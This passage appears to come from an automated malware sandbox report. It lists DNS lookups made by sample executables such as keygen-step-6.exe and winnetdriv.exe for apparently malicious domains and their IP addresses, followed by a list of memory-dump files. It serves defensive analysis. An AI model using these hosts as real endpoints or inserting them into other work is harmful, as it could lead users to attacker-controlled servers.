      evaexpand.com
      dns
      keygen-step-6.exe
      59 B
       75 B
       1
      1

      DNS Request

      evaexpand.com

      DNS Response

      185.92.244.225

    • 8.8.8.8:53
      detacher.xyz
      dns
      KiffAppE2.exe
      116 B
       148 B
       2
      2

      DNS Request

      detacher.xyz

      DNS Request

      detacher.xyz

      DNS Response

      195.123.221.77

      DNS Response

      195.123.221.77

    • 8.8.8.8:53
      kiff.store
      dns
      KiffAppE2.exe
      56 B
       72 B
       1
      1

      DNS Request

      kiff.store

      DNS Response

      195.123.221.77

    • 8.8.8.8:53
      www.wpdsfds23x.com
      dns
      winnetdriv.exe
      64 B
       181 B
       1
      1

      DNS Request

      www.wpdsfds23x.com

      DNS Response

      34.231.28.159

    • 8.8.8.8:53
      api.ip.sb
      dns
      PlsWnEU2.exe
      55 B
       145 B
       1
      1

      DNS Request

      api.ip.sb

      DNS Response

      104.26.12.31
      104.26.13.31
      172.67.75.172

    • 8.8.8.8:53
      evaexpand.com
      dns
      keygen-step-6.exe
      59 B
       75 B
       1
      1

      DNS Request

      evaexpand.com

      DNS Response

      185.92.244.225

    • 8.8.8.8:53
      www.wpdsfds23x.com
      dns
      winnetdriv.exe
      64 B
       181 B
       1
      1

      DNS Request

      www.wpdsfds23x.com

      DNS Response

      34.231.28.159

    • 8.8.8.8:53
      www.wpdsfds23x.com
      dns
      winnetdriv.exe
      64 B
       181 B
       1
      1

      DNS Request

      www.wpdsfds23x.com

      DNS Response

      34.231.28.159

    • 8.8.8.8:53
      www.wpdsfds23x.com
      dns
      winnetdriv.exe
      64 B
       181 B
       1
      1

      DNS Request

      www.wpdsfds23x.com

      DNS Response

      34.231.28.159

    • 8.8.8.8:53
      www.wpdsfds23x.com
      dns
      winnetdriv.exe
      64 B
       181 B
       1
      1

      DNS Request

      www.wpdsfds23x.com

      DNS Response

      34.231.28.159

    • 8.8.8.8:53
      www.wpdsfds23x.com
      dns
      winnetdriv.exe
      64 B
       181 B
       1
      1

      DNS Request

      www.wpdsfds23x.com

      DNS Response

      34.231.28.159

    • 8.8.8.8:53
      www.wpdsfds23x.com
      dns
      winnetdriv.exe
      64 B
       181 B
       1
      1

      DNS Request

      www.wpdsfds23x.com

      DNS Response

      34.231.28.159

    • 8.8.8.8:53
      www.wpdsfds23x.com
      dns
      winnetdriv.exe
      64 B
       181 B
       1
      1

      DNS Request

      www.wpdsfds23x.com

      DNS Response

      34.231.28.159

    • 8.8.8.8:53
      www.wpdsfds23x.com
      dns
      winnetdriv.exe
      64 B
       181 B
       1
      1

      DNS Request

      www.wpdsfds23x.com

      DNS Response

      34.231.28.159

    • 8.8.8.8:53
      www.wpdsfds23x.com
      dns
      winnetdriv.exe
      64 B
       181 B
       1
      1

      DNS Request

      www.wpdsfds23x.com

      DNS Response

      34.231.28.159

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/596-133-0x0000000000A80000-0x0000000000B65000-memory.dmp

      Filesize

      916KB

      Download

    • memory/852-174-0x0000000005140000-0x0000000005141000-memory.dmp

      Filesize

      4KB

      Download

    • memory/852-170-0x0000000004BF0000-0x0000000004BF1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/852-186-0x0000000007680000-0x0000000007681000-memory.dmp

      Filesize

      4KB

      Download

    • memory/852-185-0x0000000007420000-0x0000000007421000-memory.dmp

      Filesize

      4KB

      Download

    • memory/852-184-0x0000000007450000-0x0000000007451000-memory.dmp

      Filesize

      4KB

      Download

    • memory/852-183-0x0000000007300000-0x0000000007301000-memory.dmp

      Filesize

      4KB

      Download

    • memory/852-182-0x0000000006CD0000-0x0000000006CD1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/852-181-0x0000000006B00000-0x0000000006B01000-memory.dmp

      Filesize

      4KB

      Download

    • memory/852-180-0x0000000002764000-0x0000000002766000-memory.dmp

      Filesize

      8KB

      Download

    • memory/852-179-0x0000000002763000-0x0000000002764000-memory.dmp

      Filesize

      4KB

      Download

    • memory/852-177-0x0000000002760000-0x0000000002761000-memory.dmp

      Filesize

      4KB

      Download

    • memory/852-178-0x0000000002762000-0x0000000002763000-memory.dmp

      Filesize

      4KB

      Download

    • memory/852-176-0x00000000052D0000-0x00000000052D1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/852-167-0x0000000002200000-0x000000000224E000-memory.dmp

      Filesize

      312KB

      Download

    • memory/852-168-0x0000000000400000-0x0000000000459000-memory.dmp

      Filesize

      356KB

      Download

    • memory/852-169-0x00000000024B0000-0x00000000024D2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/852-175-0x0000000005250000-0x0000000005251000-memory.dmp

      Filesize

      4KB

      Download

    • memory/852-171-0x0000000002710000-0x0000000002730000-memory.dmp

      Filesize

      128KB

      Download

    • memory/852-172-0x0000000005700000-0x0000000005701000-memory.dmp

      Filesize

      4KB

      Download

    • memory/852-173-0x0000000002780000-0x0000000002781000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2364-160-0x0000000002660000-0x00000000027FC000-memory.dmp

      Filesize

      1.6MB

      Download

    • memory/2532-146-0x0000000000400000-0x00000000004E5000-memory.dmp

      Filesize

      916KB

      Download

    • memory/2864-126-0x0000000000CE0000-0x0000000000CF8000-memory.dmp

      Filesize

      96KB

      Download

    • memory/3644-166-0x000000001BE34000-0x000000001BE35000-memory.dmp

      Filesize

      4KB

      Download

    • memory/3644-158-0x0000000000C40000-0x0000000000C41000-memory.dmp

      Filesize

      4KB

      Download

    • memory/3644-161-0x000000001BE30000-0x000000001BE32000-memory.dmp

      Filesize

      8KB

      Download

    • memory/3644-165-0x000000001BE32000-0x000000001BE34000-memory.dmp

      Filesize

      8KB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.